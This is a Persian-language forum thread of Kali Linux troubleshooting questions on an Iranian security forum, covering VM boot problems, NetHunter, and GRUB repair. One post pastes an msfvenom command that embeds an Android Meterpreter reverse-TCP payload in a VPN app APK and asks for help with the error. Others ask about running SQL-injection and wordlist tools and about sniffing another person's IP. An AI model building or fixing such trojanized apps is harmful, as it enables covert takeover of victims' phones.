رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

Factorial

....::::{ تاپیک جامع سوالات درباره کالی لینوکس }::::...

پست های پیشنهاد شده

wmware workstation اقا من کالی لینوکس رو

نصب کردم تمام مراحلش هم درست انجام دادم

حتی پیام موفقیت هم داده

اما کالی رو نمیاره بالا مشکل چیه ?

با سلام خدمت دوست عزیز

میزان Cpu و ... اختصاص داده شده به ماشین مجازی را ارتقا دهید و دوباره تست کنید

حتی المقدور نسخه نصب شده کالی را اعلام کنید

موفق باشید

آن که اسب داشت غبارش فرو نشست

امان از گرد سم تازه خر خریده ها

به اشتراک گذاری این ارسال

لینک به ارسال
به اشتراک گذاری در سایت های دیگر
سلام دوستان

یه سئوال کلی داشتم در مورد نسخه nethunter از سیستم عامل کالی

میخواستم ببینم آیا این نسخه مثل یه نرم افزار قابل نصبه؟

یا روش استفاده ازش چیه؟

و اینکه فقط روی گوشی های nexus و OnePlus جواب میده یعنی چی؟

آیا راهی باسه دور زدنش هست که روی گوشی های دیگه هم اجرا بشه؟

با سپاس

سلام تا جایی ک میدونم نت هانتر برا گوشی های زیر عرضه شده :

Nexus 4

Nexus 5

Nexus 6

Nexus 7

Nexus 9

Nexus 10

One Plus One

این کاستوم هارو روی گوشی های دیگ فلش نکنید احتمال آسیب زیاده

پیشنهاد میکنم راجب ترموکس هم سرچی بزنید.

لینک به ارسال

اول سلام به تمامی‌ کاربران این وبسایت و تمامی‌ دوستان قدیمی‌

دوم سلام به شما کاربر عزیز

BahMan_198

1- اگر شما دارای یک دستگاه مدرن سامسونگ هستید، گزینه ای برای تغییر سخت افزار خود را به حالت دسکتاپ با DeX می دهید. در حالی که دقیقا یک سیستم عامل لینوکس نیست، این یک محیط دسکتاپ با هسته لینوکس است، بنابراین به اندازه کافی نزدیک است.

2- Remote Desktop : دسترسی‌ ریموت از دستگاه android یا ios شما به دسکتاپ linux از طریق برنامه Splash یا دیگر برنامه‌های ریموت دهنده

3- Limbo : این یک شبیه ساز لینوکس برای آندروید است، بر اساس شبیه ساز QEMU با این حال، برای تنظیم بسیار دشوار و وقت گیر است، و نتایج اغلب به ارزش تلاش نیست

4-

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
: دستگاه را به صفحه نمایش HDMI وصل کنید تا محیط دسکتاپ اوبونتو را ببینید.

امیدوارم سربسته جواب شما رو داده باشم

دوستانی که پس از نصب کالی لینوکس با یک صفحه سیاه مواجه میشوید در تنظیمات ماشین مجازی Vmware یا Virtual به قسمت system processor بروید و Processor خود را به ۲ تا بیشتر از ۲ ارتقاع دهید

در صورتی که هر سال دیگری داشتید در هر رابطه با کالی لینوکس ابتدا جزعیات مشکل را بنویسید در صورت دقیق بودن , مشکل شما را در اولین فرصت برطرف می‌کنیم .

با تشکر از شما KaMraN-Injector

لینک به ارسال

سلام من تازه کالی رو نصب کردم و داشت خوب کار میکرد

بعد از یه مدت دیدم میخوام اسکریپت اجرا کنم اصلا نمیشه میخوام پیلود رو با یه فایل ترکیب کنم نمیشه که بیشتر ارور ها:(هنگام اجرا)

msfvenom -x sky.VPN.org.apk -p android/meterpreter/reverse_tcp LHOST=192.168.42.98 LPORT=4444 -o /root/Documents/pay.com #

Using APK template: sky.VPN.org.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload [-]

No arch selected, selecting arch: dalvik from the payload [-]

Error: zipalign not found. If it's not in your PATH, please add it

یا مثلا میخوام sqliv رو اجرا کنم

from terminaltables import SingleTable

ImportError: No module named terminaltables

میخوام cupp رو اجرا کنم

import urllib.error

ImportError: No module named error

لطفا به همشون جواب بدین مرسی

لینک به ارسال

سلام من کالی لینوکس رو از طریق فلش کنار ویندوز نصب کردم بعد سیستمم ریستارت شد و دیگه نمتونم برم توی ویندوز فقط کالی رو دارم چیکار کنم ویندوزم برگرده

لینک به ارسال
سلام من کالی لینوکس رو از طریق فلش کنار ویندوز نصب کردم بعد سیستمم ریستارت شد و دیگه نمتونم برم توی ویندوز فقط کالی رو دارم چیکار کنم ویندوزم برگرده

درود بر شما

شما وارد سیستم عامل لینوکس بشید و ترمینال رو باز کنید و دستور زیر رو وارد کنید.

sudo os-prober

اگر ویندوز مورد نظرتون رو نمایش داد سپس دستور زیر را وارد کنید

sudo update-grub

بد شما سیستم رو ریستارت کنید. در غیر اینصورت اگر مشکل شما بر طرف نشد . باید از ابزار boot-repair

استفاده کنید.

لینک به ارسال
من این اموزش رو رو ای پی پابلیک امتحان میکنم نمیشه برای مثال من چطور میکنم ای پی شما رو اسنیف کنم (برای مثال )

اساسا شما باید در یک زیر شبکه باشید (در همان محدوده ای از آدرس های IP که توسط ISP داده می شود) تا بتوانید این کار را انجام دهید. با این حال، بسیاری از ISP ها دارای ویژگی های امنیتی هستند که از این امر جلوگیری می کند. و در ضمن snif جزء لایه ۲ شبکه هستش تا اونجایی که میدونم. باید اطلاعات پایه ای شبکه رو هم داشته باشید

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

• اضافه کردن...